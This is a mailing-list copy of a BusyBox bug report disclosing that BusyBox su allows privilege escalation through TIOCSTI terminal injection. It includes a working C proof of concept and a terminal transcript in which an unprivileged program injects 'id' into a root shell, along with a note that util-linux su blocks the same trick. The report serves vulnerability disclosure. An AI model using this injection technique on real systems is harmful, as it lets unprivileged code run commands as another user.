[Bug 9401] New: privilege escalation with TIOCSTI ioctl from busybox su

bugzilla at busybox.net bugzilla at busybox.net
Wed Nov 2 01:18:30 UTC 2016


https://bugs.busybox.net/show_bug.cgi?id=9401

            Bug ID: 9401
           Summary: privilege escalation with TIOCSTI ioctl from busybox
                    su
           Product: Busybox
           Version: unspecified
          Hardware: All
                OS: Linux
            Status: NEW
          Severity: normal
          Priority: P5
         Component: Other
          Assignee: unassigned at busybox.net
          Reporter: _ at lizzie.io
                CC: busybox-cvs at busybox.net
  Target Milestone: ---

Created attachment 6796
  --> https://bugs.busybox.net/attachment.cgi?id=6796&action=edit
use the TIOCSTI ioctl to write a command to the controlling tty

I noticed that Busybox su is vulnerable to tty hijacking with the
TIOCSTI ioctl. For example, this C program writes to the controlling
terminal and so can run arbitrary shell commands. With this, any
unprivileged program run with su can execute code as the calling user.

        #include <unistd.h>
        #include <sys/ioctl.h>
        #include <stdio.h>

        int main()
        {
             for (char *cmd = "id\n"; *cmd; cmd++) {
                     if (ioctl(STDIN_FILENO, TIOCSTI, cmd)) {
                             fprintf(stderr, "++ ioctl failed: %m\n");
                             return 1;
                     }
             }
             return 0;
        }


        [lizzie at empress misc]$ gcc -Wall -Werror tiocsti.c -o tiocsti
        [lizzie at empress misc]$ sudo bash
        [root at empress misc]# ./busybox su -v
        su: invalid option -- 'v'
        BusyBox v1.26.0.git (2016-10-25 17:15:49 PDT) multi-call binary.

        Usage: su [OPTIONS] [-] [USER]

        Run shell under USER (by default, root)

                -,-l    Clear environment, run shell as login shell
                -p,-m   Do not set new $HOME, $SHELL, $USER, $LOGNAME
                -c CMD  Command to pass to 'sh -c'
                -s SH   Shell to use instead of user's default
        [root at empress misc]# ./busybox su lizzie -c ./tiocsti
        id
        [root at empress misc]# id
        uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),19(log)
        [root at empress misc]# ./busybox --version

Note that this was done without any user interaction beyond './busybox
su lizzie -c ./tiocsti'. Also worth noting that util-linux su prevents
this. (CVE-2005-4890 was a similar issue from 2005 in util-linux su).

        [root at empress misc]# su --version
        su from util-linux 2.28.2
        [root at empress misc]# su lizzie  -c tiocsti
        bash: tiocsti: command not found
        [root at empress misc]# su lizzie -c ./tiocsti
        ++ ioctl failed: Operation not permitted

-- 
You are receiving this mail because:
You are on the CC list for the bug.


More information about the busybox-cvs mailing list